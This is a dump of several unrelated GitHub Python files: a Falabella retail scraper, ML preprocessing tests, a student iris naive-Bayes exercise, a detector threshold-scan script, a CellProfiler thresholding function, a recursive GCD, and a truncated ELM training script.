subsection,\n 'type': subsection_type\n })\n elif subsection_type == bs.SUBSECTION_TYPE_CATEGORY_PAGE:\n session = session_with_proxy(extra_args)\n session.headers['User-Agent'] = CF_REQUEST_HEADERS[\n 'User-Agent']\n soup = BeautifulSoup(session.get(url, timeout=30).text,\n 'html.parser')\n next_data = json.loads(soup.find(\n 'script', {'id': '__NEXT_DATA__'}).text)\n\n for container in \\\n next_data['props']['pageProps']['page']['containers']:\n if container['key'] == 'main-right':\n showcase_container = container\n break\n else:\n raise Exception('No showcase container found')\n\n slides = showcase_container['components'][0]['data']['slides']\n\n for idx, slide in enumerate(slides):\n main_url = slide.get('mainUrl', None)\n if main_url:\n destination_urls = [main_url]\n elif slide['type'] == 'background_image_only':\n destination_urls = []\n else:\n destination_urls = list(\n {slide['urlLeft'], slide['urlRight']})\n picture_url = slide['imgBackgroundDesktopUrl']\n\n banners.append({\n 'url': url,\n 'picture_url': picture_url,\n 'destination_urls': destination_urls,\n 'key': picture_url,\n 'position': idx + 1,\n 'section': section,\n 'subsection': subsection,\n 'type': subsection_type\n })\n elif subsection_type == bs.SUBSECTION_TYPE_MOSAIC:\n session = session_with_proxy(extra_args)\n session.headers['User-Agent'] = CF_REQUEST_HEADERS[\n 'User-Agent']\n soup = BeautifulSoup(session.get(url).text, 'html.parser')\n banner = soup.find('div', 'fb-huincha-main-wrap')\n\n if not banner:\n print('No banner for ' + url)\n continue\n\n image_url = banner.find('source')['srcset']\n dest_url = banner.find('a')['href']\n\n banners.append({\n 'url': url,\n 'picture_url': image_url,\n 'destination_urls': [dest_url],\n 'key': image_url,\n 'position': 1,\n 'section': section,\n 'subsection': subsection,\n 'type': subsection_type})\n\n return banners\n\n @classmethod\n def _get_picture_urls(cls, session, product_id):\n pictures_resource_url = 'https://falabella.scene7.com/is/image/' \\\n 'Falabella/{}?req=set,json'.format(product_id)\n pictures_response = session.get(pictures_resource_url, timeout=30).text\n pictures_json = json.loads(\n re.search(r's7jsonResponse\\((.+),\"\"\\);',\n pictures_response).groups()[0])\n\n picture_urls = []\n\n picture_entries = pictures_json['set']['item']\n if not isinstance(picture_entries, list):\n picture_entries = [picture_entries]\n\n for picture_entry in picture_entries:\n picture_url = 'https://falabella.scene7.com/is/image/{}?' \\\n 'wid=1500&hei=1500&qlt=70'.format(\n picture_entry['i']['n'])\n picture_urls.append(picture_url)\n\n return picture_urls\n\n @classmethod\n def reviews_for_sku(cls, sku):\n print(sku)\n session = session_with_proxy(None)\n reviews = []\n offset = 0\n\n while True:\n print(offset)\n endpoint = 'https://api.bazaarvoice.com/data/batch.json?' 
\\\n 'passkey=m8bzx1s49996pkz12xvk6gh2e&apiversion=' \\\n '5.5&resource.q0=reviews&filter.q0=isratings' \\\n 'only%3Aeq%3Afalse&filter.q0=productid%3Aeq' \\\n '%3A{}&limit.q0=100&offset.q0={}'.format(sku, offset)\n response = session.get(endpoint).json()[\n 'BatchedResults']['q0']['Results']\n\n if not response:\n break\n\n for entry in response:\n review_date = parse(entry['SubmissionTime'])\n\n review = {\n 'store': 'Falabella',\n 'sku': sku,\n 'rating': float(entry['Rating']),\n 'text': entry['ReviewText'],\n 'date': review_date.isoformat()\n }\n\n reviews.append(review)\n\n offset += 100\n\n return reviews\n","repo_name":"SoloTodo/storescraper","sub_path":"storescraper/stores/falabella.py","file_name":"falabella.py","file_ext":"py","file_size_in_byte":34132,"program_lang":"python","lang":"en","doc_type":"code","stars":47,"dataset":"github-code","pt":"69"}
+{"seq_id":"70509587099","text":"from typing import Tuple\n\nimport hypothesis.strategies as st\nimport numpy as np\nimport pytest\nfrom athology_ml.ml.jump_detection import preprocessing\nfrom hypothesis import given\nfrom hypothesis.extra import numpy\nfrom tensorflow.data import Dataset\nfrom tensorflow.keras.layers.experimental.preprocessing import Normalization\n\n\ndef test_pack_features_vector_correct_shape(\n dummy_jump_detection_dataset: Tuple[Dataset, Dataset, Dataset]\n) -> None:\n \"\"\"Sanity check that feature and label vector packing produce tensors of the correct shape.\"\"\"\n train_dataset, _, _ = dummy_jump_detection_dataset\n train_dataset = train_dataset.map(preprocessing.pack_features_vector)\n num_features = 3\n for features, labels in train_dataset.as_numpy_iterator():\n assert features.shape == (num_features,)\n assert labels.shape == (1,)\n\n\ndef test_get_features_and_labels(\n dummy_jump_detection_dataset: Tuple[Dataset, Dataset, Dataset]\n) -> None:\n \"\"\"Sanity check that get_features_and_labels returns tensors of the correct shape.\"\"\"\n train_dataset, _, _ = dummy_jump_detection_dataset\n # get_features_and_labels expects pack_features_vector to have been called\n train_dataset = train_dataset.map(preprocessing.pack_features_vector)\n num_rows, num_features = 100, 3\n all_features, all_labels = preprocessing.get_features_and_labels(\n dataset=train_dataset, num_rows=num_rows\n )\n assert all_features.shape == (num_rows, num_features)\n assert all_labels.shape == (num_rows,)\n\n\n@given(\n numpy.arrays(\n np.dtype(\"bool\"),\n shape=st.tuples(\n st.integers(min_value=0, max_value=16), st.integers(min_value=0, max_value=16)\n ),\n )\n)\ndef test_get_classifier_bias_init(labels: np.ndarray) -> None:\n \"\"\"Tests get_classifier_bias_init over a grid of random, two-dimensional bool arrays.\"\"\"\n pos = labels.sum()\n neg = labels.size - pos\n\n # Assert that a ValueError is raised if labels is an empty array.\n if not labels.size:\n with pytest.raises(ValueError):\n _ = preprocessing.get_classifier_bias_init(labels)\n else:\n actual = preprocessing.get_classifier_bias_init(labels)\n # If there is at least one positive and one negative, we should be returning\n # the log ratio of the support. Otherwise we should be returning None.\n if pos > 0 and neg > 0:\n expected = np.log(pos / neg)\n else:\n expected = None\n\n assert actual == expected\n\n\ndef test_get_normalizer() -> None:\n \"\"\"Sanity check that the normalization layer can be created with some valid training data.\"\"\"\n # batch_size and timesteps are tuneable. Here we use similar values as used during training.\n # input_dim and output_dim are decided by the data and the feature_extractor layer respectively.\n batch_size, timesteps, input_dim, output_dim = 1, 128, 3, 5\n\n features = np.random.rand(batch_size, timesteps, input_dim)\n sum_ = np.sum(features, axis=-1, keepdims=True)\n norm = np.linalg.norm(features, axis=-1, keepdims=True)\n inputs = np.concatenate((features, sum_, norm), axis=-1)\n\n normalizer = preprocessing.get_normalizer(features)\n assert isinstance(normalizer, Normalization)\n outputs = normalizer(inputs).numpy()\n assert outputs.shape == (batch_size, timesteps, output_dim)\n\n\ndef test_get_normalizer_value_error() -> None:\n \"\"\"Check that the get_normalizer will return a ValueError for bad data.\"\"\"\n # batch_size and timesteps are tuneable. 
Here we use similar values as used during training.\n # input_dim and output_dim are decided by the data and the feature_extractor layer respectively.\n batch_size, timesteps, input_dim = 1, 128, 3\n\n features = np.random.rand(0, timesteps, input_dim)\n with pytest.raises(ValueError):\n _ = preprocessing.get_normalizer(features)\n\n features = np.random.rand(batch_size, 0, input_dim)\n with pytest.raises(ValueError):\n _ = preprocessing.get_normalizer(features)\n","repo_name":"dcsil/athology-ml","sub_path":"tests/ml/jump_detection/test_preprocessing.py","file_name":"test_preprocessing.py","file_ext":"py","file_size_in_byte":4013,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"69"}
+{"seq_id":"2051689053","text":"\"\"\"\nAutor: GAÑAN, Tomas // CERIONI, Enrique \nEjercicio 9b: Flores (Gaussiano)\n\"\"\"\n\n# Importacion de librerias/modulos\n\nimport numpy as np\nimport random\nimport math\nimport statistics as stats\n\n# Funcion Calculo Gauss\n\ndef calculoGauss(med,var,x):\n den = var * math.sqrt(2*math.pi)\n miem = pow(math.e,-0.5*pow((x-med)/var,2))\n gauss = (1/den)*miem\n \n return gauss\n\n# Funcion Evaluacion\n\ndef evaluar(prob1,prob2,prob3):\n valueMax = max(prob1,prob2,prob3)\n if(valueMax == prob1):\n print(\"Se clasifica como: SETOSA - El valor máximo es: \",valueMax)\n elif(valueMax == prob2):\n print(\"Se clasifica como: VERSICOLOR - El valor máximo es: \",valueMax)\n else:\n print(\"Se clasifica como: VIRGINICA - El valor máximo es: \",valueMax)\n \n# Desarrollo\n\nfileName = open('iris.txt','r')\n\ndata = []\n\nfor i in fileName.readlines(): \n lista = i.split(',') \n flores = []\n for item in lista:\n if not item.startswith('Iris'):\n item = float(item)\n else:\n item = item.rstrip('\\n')\n flores.append(item)\n data.append(flores)\t\n\nirisSetosa = 0\nirisVersi = 0\nirisVergi = 0\n\nfor j in range(150):\n if(data[j][4] == 'Iris-setosa'):\n irisSetosa += 1\n elif(data[j][4] == 'Iris-versicolor'):\n irisVersi += 1\n else:\n irisVergi += 1\n \n# Probabilidades generales\n\nprobSetosa = round(irisSetosa/len(data),2)\nprobVersi = round(irisVersi/len(data),2)\nprobVergi = round(irisVergi/len(data),2)\n\n# Contadores\n\nlongitudCepalSetosa = []\nanchoCepalSetosa = []\nlongitudPetaloSetosa = []\nanchoPetaloSetosa = []\n\nlongitudCepalVersi = []\nanchoCepalVersi = []\nlongitudPetaloVersi = []\nanchoPetaloVersi = []\n\nlongitudCepalVergi = []\nanchoCepalVergi = []\nlongitudPetaloVergi = []\nanchoPetaloVergi = []\n\nfor j in range(150):\n if(data[j][4] == 'Iris-setosa'):\n longitudCepalSetosa.append(data[j][0])\n anchoCepalSetosa.append(data[j][1])\n longitudPetaloSetosa.append(data[j][2])\n anchoPetaloSetosa.append(data[j][3])\n elif(data[j][4] == 'Iris-versicolor'):\n longitudCepalVersi.append(data[j][0])\n anchoCepalVersi.append(data[j][1])\n longitudPetaloVersi.append(data[j][2])\n anchoPetaloVersi.append(data[j][3])\n elif(data[j][4] == 'Iris-virginica'):\n longitudCepalVergi.append(data[j][0])\n anchoCepalVergi.append(data[j][1])\n longitudPetaloVergi.append(data[j][2])\n anchoPetaloVergi.append(data[j][3])\n \n# Media y varianza para la Longitud Cepal\n\nmedLongCepalSetosa = np.mean(longitudCepalSetosa)\nmedLongCepalVersi = np.mean(longitudCepalVersi)\nmedLongCepalVergi = np.mean(longitudCepalVergi)\n\nvarLongCepalSetosa = np.var(longitudCepalSetosa)\nvarLongCepalVersi = np.var(longitudCepalVersi)\nvarLongCepalVergi = np.var(longitudCepalVergi)\n\n# Media y varianza para la Ancho Cepal\n\nmedAnchoCepalSetosa = np.mean(anchoCepalSetosa)\nmedAnchoCepalVersi = np.mean(anchoCepalVersi)\nmedAnchoCepalVergi = np.mean(anchoCepalVergi)\n\nvarAnchoCepalSetosa = np.var(anchoCepalSetosa)\nvarAnchoCepalVersi = np.var(anchoCepalVersi)\nvarAnchoCepalVergi = np.var(anchoCepalVergi)\n\n# Media y varianza para la Longitud Petalo\n\nmedLongPetalSetosa = np.mean(longitudPetaloSetosa)\nmedLongPetalVersi = np.mean(longitudPetaloVersi)\nmedLongPetalVergi = np.mean(longitudPetaloVergi)\n\nvarLongPetalSetosa = np.var(longitudPetaloSetosa)\nvarLongPetalVersi = np.var(longitudPetaloVersi)\nvarLongPetalVergi = np.var(longitudPetaloVergi)\n\n# Media y varianza para la Ancho Petalo\n\nmedAnchoPetalSetosa = np.mean(anchoPetaloSetosa)\nmedAnchoPetalVersi = 
np.mean(anchoPetaloVersi)\nmedAnchoPetalVergi = np.mean(anchoPetaloVergi)\n\nvarAnchoPetalSetosa = np.var(anchoPetaloSetosa)\nvarAnchoPetalVersi = np.var(anchoPetaloVersi)\nvarAnchoPetalVergi = np.var(anchoPetaloVergi)\n\n\"\"\"\n---> 5.3, 4.0, 1.6, 0.3\n---> 5.0, 2.1, 4.6, 1.2\n---> 6.9, 4.1, 2.6, 1.4\n\"\"\"\n\n# Probabilidad a posteriori para cada clase\n\n# Ejemplo 1\n\nprobTotSetosa1 = probSetosa * calculoGauss(medLongCepalSetosa,varLongCepalSetosa,5.3) * calculoGauss(medAnchoCepalSetosa, varAnchoCepalSetosa,4.0) * calculoGauss(medLongPetalSetosa,varLongPetalSetosa,1.6) * calculoGauss(medAnchoPetalSetosa,varAnchoPetalSetosa,0.3)\nprobTotVersi1 = probVersi * calculoGauss(medLongCepalVersi,varLongCepalVersi,5.3) * calculoGauss(medAnchoCepalVersi,varAnchoCepalVersi,4.0) * calculoGauss(medLongPetalVersi,varLongPetalVersi,1.6) * calculoGauss(medAnchoPetalVersi,varAnchoPetalVersi,0.3)\nprobTotVergi1 = probVergi * calculoGauss(medLongCepalVergi,varLongCepalVergi,5.3) * calculoGauss(medAnchoCepalVergi,varAnchoCepalVergi,4.0) * calculoGauss(medLongPetalVergi,varLongPetalVergi,1.6) * calculoGauss(medAnchoPetalVergi, varAnchoPetalVergi,0.3)\n\n# Ejemplo 2\n\nprobTotSetosa2 = probSetosa * calculoGauss(medLongCepalSetosa,varLongCepalSetosa,5.0) * calculoGauss(medAnchoCepalSetosa, varAnchoCepalSetosa,2.1) * calculoGauss(medLongPetalSetosa,varLongPetalSetosa,4.6) * calculoGauss(medAnchoPetalSetosa,varAnchoPetalSetosa,1.2)\nprobTotVersi2 = probVersi * calculoGauss(medLongCepalVersi,varLongCepalVersi,5.0) * calculoGauss(medAnchoCepalVersi,varAnchoCepalVersi,2.1) * calculoGauss(medLongPetalVersi,varLongPetalVersi,4.6) * calculoGauss(medAnchoPetalVersi,varAnchoPetalVersi,1.2)\nprobTotVergi2 = probVergi * calculoGauss(medLongCepalVergi,varLongCepalVergi,5.0) * calculoGauss(medAnchoCepalVergi,varAnchoCepalVergi,2.1) * calculoGauss(medLongPetalVergi,varLongPetalVergi,4.6) * calculoGauss(medAnchoPetalVergi, varAnchoPetalVergi,1.2)\n\n# Ejemplo 3\n\nprobTotSetosa3 = probSetosa * calculoGauss(medLongCepalSetosa,varLongCepalSetosa,6.9) * calculoGauss(medAnchoCepalSetosa, varAnchoCepalSetosa,4.1) * calculoGauss(medLongPetalSetosa,varLongPetalSetosa,2.6) * calculoGauss(medAnchoPetalSetosa,varAnchoPetalSetosa,1.4)\nprobTotVersi3 = probVersi * calculoGauss(medLongCepalVersi,varLongCepalVersi,6.9) * calculoGauss(medAnchoCepalVersi,varAnchoCepalVersi,4.1) * calculoGauss(medLongPetalVersi,varLongPetalVersi,2.6) * calculoGauss(medAnchoPetalVersi,varAnchoPetalVersi,1.4)\nprobTotVergi3 = probVergi * calculoGauss(medLongCepalVergi,varLongCepalVergi,6.9) * calculoGauss(medAnchoCepalVergi,varAnchoCepalVergi,4.1) * calculoGauss(medLongPetalVergi,varLongPetalVergi,2.6) * calculoGauss(medAnchoPetalVergi, varAnchoPetalVergi,1.4)\n\nevaluar(probTotSetosa1,probTotVersi1,probTotVergi1)\nevaluar(probTotSetosa2,probTotVersi2,probTotVergi2)\nevaluar(probTotSetosa3,probTotVersi3,probTotVergi3)","repo_name":"enriquecerioni/IA-2019","sub_path":"TP N°9/ej9b.py","file_name":"ej9b.py","file_ext":"py","file_size_in_byte":6458,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"28217405078","text":"import os,sys,time\n\nimport numpy as np\nimport bitarray\nimport tables as tb\nimport logging\nimport yaml\n\nimport monopix_daq.scans.injection_scan as injection_scan\nimport monopix_daq.analysis.utils \nINJCAP=2.7E-15\n\nlocal_configuration={\"injlist\": np.arange(0.005,0.6,0.005),\n 'pix': [18,25], \n 'n_mask_pix': 23, #A list of pixels to go through\n \"disable_noninjected_pixel\":True,\n \"with_mon\": False\n}\n\nclass ThScan(injection_scan.InjectionScan):\n scan_id = \"th_scan\"\n \n def scan(self,**kwargs):\n \"\"\"\n pix: list of pixels \n injlist: array of injection voltage to scan (inj_high-inj_low)\n n_mask_pix: number of pixels which injected at once.\n Other configuration must be configured before scan.start()\n \"\"\"\n kwargs[\"pix\"]=kwargs.pop(\"pix\",local_configuration['pix'])\n\n kwargs[\"thlist\"]=None\n kwargs[\"injlist\"]=kwargs.pop(\"injlist\",local_configuration['injlist'])\n kwargs[\"phaselist\"]=None\n\n kwargs[\"n_mask_pix\"]=kwargs.pop(\"n_mask_pix\",local_configuration['n_mask_pix'])\n kwargs[\"disable_noninjected_pixel\"]=kwargs.pop(\"disable_noninjected_pixel\",local_configuration['disable_noninjected_pixel'])\n kwargs[\"with_mon\"]=kwargs.pop(\"with_mon\",local_configuration['with_mon'])\n super(ThScan, self).scan(**kwargs)\n\n def analyze(self):\n fraw = self.output_filename +'.h5'\n fhit=fraw[:-7]+'hit.h5'\n fev=fraw[:-7]+'ev.h5'\n \n super(ThScan, self).analyze()\n\n import monopix_daq.analysis.analyze_cnts as analyze_cnts\n ana=analyze_cnts.AnalyzeCnts(fev,fraw)\n ana.init_scurve()\n ana.init_scurve_fit()\n ana.init_th_dist()\n ana.init_noise_dist()\n ana.run()\n \n def plot(self, save_png=False, pixel_scurve=False, perflavour=True):\n fev=self.output_filename[:-4]+'ev.h5'\n fraw = self.output_filename +'.h5'\n fpdf = self.output_filename +'.pdf'\n\n import monopix_daq.analysis.plotting_base as plotting_base\n with plotting_base.PlottingBase(fpdf,save_png=save_png) as plotting:\n with tb.open_file(fraw) as f:\n firmware=yaml.load(f.root.meta_data.attrs.firmware)\n inj_n=firmware[\"inj\"][\"REPEAT\"]\n ## DAC Configuration page\n dat=yaml.load(f.root.meta_data.attrs.dac_status)\n dat.update(yaml.load(f.root.meta_data.attrs.power_status))\n dat[\"inj_n\"]=inj_n\n dat[\"inj_delay\"]=firmware[\"inj\"][\"DELAY\"]\n dat[\"inj_width\"]=firmware[\"inj\"][\"WIDTH\"]\n global_th = dat[\"TH[V]\"]\n plotting.table_1value(dat,page_title=\"Chip configuration\")\n\n dat=yaml.load(f.root.meta_data.attrs.pixel_conf)\n with tb.open_file(fev) as f:\n ## Pixel configuration page\n injected=f.root.Injected[:]\n plotting.plot_2d_pixel_4(\n [injected,injected,dat[\"MONITOR_EN\"],dat[\"TRIM_EN\"]],\n page_title=\"Pixel configuration\",\n title=[\"Preamp\",\"Inj\",\"Mon\",\"TDAC\"], \n z_min=[0,0,0,0], z_max=[1,1,1,15])\n\n ## Scurve\n for i in range(len(f.root.Scurve)):\n dat=f.root.Scurve[i][\"scurve\"]\n xbins=f.root.Scurve.attrs.xbins\n ybins=f.root.Scurve.attrs.ybins\n plotting.plot_2d_hist(dat,\n bins=[xbins,ybins],\n title=f.root.Scurve.title,\n z_axis_title=\"\",z_min=1,z_max=\"maximum\",z_scale=\"log\")\n\n ## Threshold distribution\n for i in range(len(f.root.ThDist)):\n dat=f.root.ThDist[i]\n plotting.plot_2d_pixel_hist(dat[\"mu\"],title=str(f.root.ThDist.title)+\" (TH = %.3f V)\"%global_th,\n z_min=0.0,\n z_max='median',\n z_axis_title='Threshold')\n plotting.plot_1d_pixel_hists_gauss([dat[\"mu\"]],mask=injected,\n top_axis_factor=INJCAP/1.602E-19,\n top_axis_title=\"Threshold [e]\",\n x_axis_title=\"Testpulse injection [V]\",\n 
title=str(f.root.ThDist.title)+\" (TH = %.3f V)\"%global_th)\n ## Noise distribution\n for i in range(len(f.root.NoiseDist)):\n dat=f.root.NoiseDist[i]\n plotting.plot_2d_pixel_hist(dat[\"sigma\"],title=str(f.root.NoiseDist.title),\n z_min=0.0, \n z_max='median',\n z_axis_title='Noise')\n plotting.plot_1d_pixel_hists_gauss([dat[\"sigma\"]],mask=injected,\n top_axis_factor=INJCAP/1.602E-19,\n top_axis_title=\"Noise [e]\",\n x_axis_title=\"S-curve Sigma [V]\",\n title=str(f.root.NoiseDist.title))\n \n if pixel_scurve:\n for p_i,p in enumerate(np.argwhere(injected)):\n res=monopix_daq.analysis.utils.get_scurve(f_event=f, pixel=p, type=\"inj\")\n plotting.plot_scurve([res],\n dat_title=[\"mu=%.4f sigma=%.4f\"%(res[\"mu\"],res[\"sigma\"])],\n title=\"Pixel [%d %d], Threshold = %.4f\"%(p[0],p[1],global_th),\n y_min=0,\n y_max=inj_n*1.5,\n reverse=False)\n else:\n pass\n if perflavour:\n for col in range(0,36,4):\n ## Threshold distribution\n for i in range(len(f.root.ThDist)):\n dat=f.root.ThDist[i]\n dat_flav=np.zeros_like(dat[\"mu\"])\n dat_flav[col:col+4,:]=dat[\"mu\"][col:col+4,:]\n plotting.plot_2d_pixel_hist(dat_flav,title=str(f.root.ThDist.title)+\" (Flavour %.1d)\"%(col/4)+\" (TH = %.3f V)\"%global_th,\n z_min=0.0,\n z_max='median',\n z_axis_title='Threshold')\n plotting.plot_1d_pixel_hists_gauss([dat[\"mu\"][col:col+4,:]],mask=injected[col:col+4,:],\n top_axis_factor=INJCAP/1.602E-19,\n top_axis_title=\"Threshold [e]\",\n x_axis_title=\"Testpulse injection [V]\",\n title=str(f.root.ThDist.title)+\" (Flavour %.1d)\"%((col/4)+1)+\" (TH = %.3f V)\"%global_th)\n ## Noise distribution\n for i in range(len(f.root.NoiseDist)):\n dat=f.root.NoiseDist[i]\n dat_flav=np.zeros_like(dat[\"sigma\"])\n dat_flav[col:col+4,:]=dat[\"sigma\"][col:col+4,:]\n plotting.plot_2d_pixel_hist(dat_flav,title=str(f.root.NoiseDist.title)+\" (Flavour %.1d)\"%(col/4),\n z_min=0.0, \n z_max='median',\n z_axis_title='Noise')\n plotting.plot_1d_pixel_hists_gauss([dat[\"sigma\"][col:col+4,:]],mask=injected[col:col+4,:],\n top_axis_factor=INJCAP/1.602E-19,\n top_axis_title=\"Noise [e]\",\n x_axis_title=\"S-curve Sigma [V]\",\n title=str(f.root.NoiseDist.title)+\" (Flavour %.1d)\"%((col/4)+1))\n\nif __name__ == \"__main__\":\n from monopix_daq import monopix\n import argparse\n \n parser = argparse.ArgumentParser(usage=\"python th_scan.py\",\n formatter_class=argparse.RawTextHelpFormatter)\n parser.add_argument(\"--config_file\", type=str, default=None)\n parser.add_argument('-t',\"--th\", type=float, default=None)\n\n parser.add_argument('-ib',\"--inj_start\", type=float, \n default=local_configuration[\"injlist\"][0])\n parser.add_argument('-ie',\"--inj_stop\", type=float, \n default=local_configuration[\"injlist\"][-1])\n parser.add_argument('-is',\"--inj_step\", type=float, \n default=local_configuration[\"injlist\"][1]-local_configuration[\"injlist\"][0])\n\n parser.add_argument(\"-nmp\",\"--n_mask_pix\",type=int,default=local_configuration[\"n_mask_pix\"])\n parser.add_argument(\"-f\",\"--flavor\", type=str, default=None)\n parser.add_argument(\"-p\",\"--power_reset\", action='store_const', const=1, default=0) ## defualt=True: skip power reset\n\n args=parser.parse_args()\n local_configuration[\"injlist\"]=np.arange(args.inj_start,args.inj_stop,args.inj_step)\n local_configuration[\"n_mask_pix\"]=args.n_mask_pix\n\n m=monopix.Monopix(no_power_reset=not bool(args.power_reset))\n scan = ThScan(m,online_monitor_addr=\"tcp://127.0.0.1:6500\")\n \n if args.config_file is not None:\n m.load_config(args.config_file)\n if 
args.th is not None:\n m.set_th(args.th)\n if args.flavor is not None:\n if args.flavor==\"all\":\n collist=np.arange(0,m.COL_SIZE)\n else:\n tmp=args.flavor.split(\":\")\n collist=np.arange(int(tmp[0]),int(tmp[1]))\n pix=[]\n for i in collist:\n for j in range(0,m.ROW_SIZE):\n pix.append([i,j])\n m.set_preamp_en(pix)\n else:\n pix=list(np.argwhere(m.dut.PIXEL_CONF[\"PREAMP_EN\"][:,:]))\n local_configuration[\"pix\"]=pix \n\n scan.start(**local_configuration)\n scan.analyze()\n scan.plot()\n","repo_name":"SiLab-Bonn/monopix_daq","sub_path":"monopix_daq/scans/th_scan.py","file_name":"th_scan.py","file_ext":"py","file_size_in_byte":10460,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"69"}
+{"seq_id":"43540772184","text":"#Faça um programa que peça uma nota, entre zero e dez. Mostre uma mensagem caso o valor seja inválido e \n#continue pedindo até que o usuário informe um valor válido.\n\nnota = input(\"Escreva um nota de zero a dez: \")\n#int_nota = int(nota)\nint_nota_escolhida = \"7\"\n\nwhile nota != int_nota_escolhida:\n print (\"Valor invalido!\")\n nota = input(\"Escolha outro valor: \")\n\nprint(\"Valor correto!\")","repo_name":"brmarcosgomes/Projeto-Python","sub_path":"Exercicios/valor_correto.py","file_name":"valor_correto.py","file_ext":"py","file_size_in_byte":399,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"21764649216","text":"import centrosome\nimport numpy\nimport skimage\nfrom cellprofiler.library.functions.image_processing import (\n get_adaptive_threshold,\n get_global_threshold,\n apply_threshold,\n)\n\n\ndef threshold(\n image,\n mask=None,\n threshold_scope=\"global\",\n threshold_method=\"otsu\",\n assign_middle_to_foreground=\"foreground\",\n log_transform=False,\n threshold_correction_factor=1,\n threshold_min=0,\n threshold_max=1,\n window_size=50,\n smoothing=0,\n lower_outlier_fraction=0.05,\n upper_outlier_fraction=0.05,\n averaging_method=\"mean\",\n variance_method=\"standard_deviation\",\n number_of_deviations=2,\n volumetric=False,\n automatic=False,\n **kwargs,\n):\n \"\"\"\n Returns three threshold values and a binary image.\n Thresholds returned are:\n\n Final threshold: Threshold following application of the\n threshold_correction_factor and clipping to min/max threshold\n\n orig_threshold: The threshold following either adaptive or global\n thresholding strategies, prior to correction\n\n guide_threshold: Only produced by adaptive threshold, otherwise None.\n This is the global threshold that constrains the adaptive threshold\n within a certain range, as defined by global_limits (default [0.7, 1.5])\n \"\"\"\n\n if automatic:\n # Use automatic settings\n smoothing = 1\n log_transform = False\n threshold_scope = \"global\"\n threshold_method = \"minimum_cross_entropy\"\n\n # Only pass robust_background kwargs when selected as the threshold_method\n if threshold_method.casefold() == \"robust_background\":\n kwargs = {\n \"lower_outlier_fraction\": lower_outlier_fraction,\n \"upper_outlier_fraction\": upper_outlier_fraction,\n \"averaging_method\": averaging_method,\n \"variance_method\": variance_method,\n \"number_of_deviations\": number_of_deviations,\n }\n\n if threshold_scope.casefold() == \"adaptive\":\n final_threshold = get_adaptive_threshold(\n image,\n mask=mask,\n threshold_method=threshold_method,\n window_size=window_size,\n threshold_min=threshold_min,\n threshold_max=threshold_max,\n threshold_correction_factor=threshold_correction_factor,\n assign_middle_to_foreground=assign_middle_to_foreground,\n log_transform=log_transform,\n volumetric=volumetric,\n **kwargs,\n )\n orig_threshold = get_adaptive_threshold(\n image,\n mask=mask,\n threshold_method=threshold_method,\n window_size=window_size,\n # If automatic=True, do not correct the threshold\n threshold_min=threshold_min if automatic else 0,\n threshold_max=threshold_max if automatic else 1,\n threshold_correction_factor=threshold_correction_factor if automatic else 1,\n assign_middle_to_foreground=assign_middle_to_foreground,\n log_transform=log_transform,\n volumetric=volumetric,\n **kwargs,\n )\n\n guide_threshold = get_global_threshold(\n image,\n mask=mask,\n threshold_method=threshold_method,\n threshold_min=threshold_min,\n threshold_max=threshold_max,\n threshold_correction_factor=threshold_correction_factor,\n assign_middle_to_foreground=assign_middle_to_foreground,\n log_transform=log_transform,\n **kwargs,\n )\n\n binary_image, sigma = apply_threshold(\n image,\n threshold=final_threshold,\n mask=mask,\n smoothing=smoothing,\n )\n\n return final_threshold, orig_threshold, guide_threshold, binary_image, sigma\n\n elif threshold_scope.casefold() == \"global\":\n final_threshold = get_global_threshold(\n image,\n mask=mask,\n threshold_method=threshold_method,\n threshold_min=threshold_min,\n threshold_max=threshold_max,\n threshold_correction_factor=threshold_correction_factor,\n 
assign_middle_to_foreground=assign_middle_to_foreground,\n log_transform=log_transform,\n **kwargs,\n )\n orig_threshold = get_global_threshold(\n image,\n mask=mask,\n threshold_method=threshold_method,\n # If automatic=True, do not correct the threshold\n threshold_min=threshold_min if automatic else 0,\n threshold_max=threshold_max if automatic else 1,\n threshold_correction_factor=threshold_correction_factor if automatic else 1,\n assign_middle_to_foreground=assign_middle_to_foreground,\n log_transform=log_transform,\n **kwargs,\n )\n guide_threshold = None\n binary_image, sigma = apply_threshold(\n image,\n threshold=final_threshold,\n mask=mask,\n smoothing=smoothing,\n )\n return final_threshold, orig_threshold, guide_threshold, binary_image, sigma\n","repo_name":"CellProfiler/CellProfiler","sub_path":"cellprofiler/library/modules/_threshold.py","file_name":"_threshold.py","file_ext":"py","file_size_in_byte":5092,"program_lang":"python","lang":"en","doc_type":"code","stars":819,"dataset":"github-code","pt":"69"}
+{"seq_id":"40913451881","text":"def cmmdc(a,b):\n r = a%b\n if r==0:\n return b\n elif r==1:\n return 1\n print(b)\n return cmmdc(b,r)\nif __name__ == '__main__':\n print(cmmdc(216,28))\n","repo_name":"ionutsturzu/recursivitate","sub_path":"cel_mai_mare_divizor_comun.py","file_name":"cel_mai_mare_divizor_comun.py","file_ext":"py","file_size_in_byte":177,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"74751244059","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\nimport pickle\nfrom ELMClassifier.random_hidden_layer import RBFRandomHiddenLayer\nfrom ELMClassifier.random_hidden_layer import SimpleRandomHiddenLayer\nfrom ELMClassifier.elm import ELMClassifier\nfrom ELMClassifier.random_layer import GRBFRandomLayer\nimport os\nimport sklearn.metrics as metrics\nfrom scipy.fftpack import fft,hilbert\nimport time\nimport numpy as np\nfrom ELMClassifier.label_smoothing_elm import ELMClassifierLabelSmooth\nfrom config import opt\nimport torch\nimport random\n\ndef input_mapping(x,B):\n B_proj = (2. * np.pi)*B\n x = fft(x)\n xr = x.real @ np.cos(B_proj) - x.imag @ np.sin(B_proj)\n xi = x.imag @ np.cos(B_proj) + x.real @ np.sin(B_proj)\n return np.concatenate([xr,xi],axis=1)\n\n# def input_mapping(x,B):\n# z = fft(x)\n# return np.concatenate([z.real,z.imag],axis=1)\n\n# def input_mapping(x,B):\n# return x\n\ndef kelm_train(x_train,y_train,hidden_layer='rbf',n_hidden = 1000,use_label_smooth=False,B=None):\n print(\" Begin training\")\n start = time.time()\n if hidden_layer == 'rbf':\n siglayer = RBFRandomHiddenLayer(n_hidden=n_hidden, gamma=1e-3, use_exemplars=False)\n elif hidden_layer == 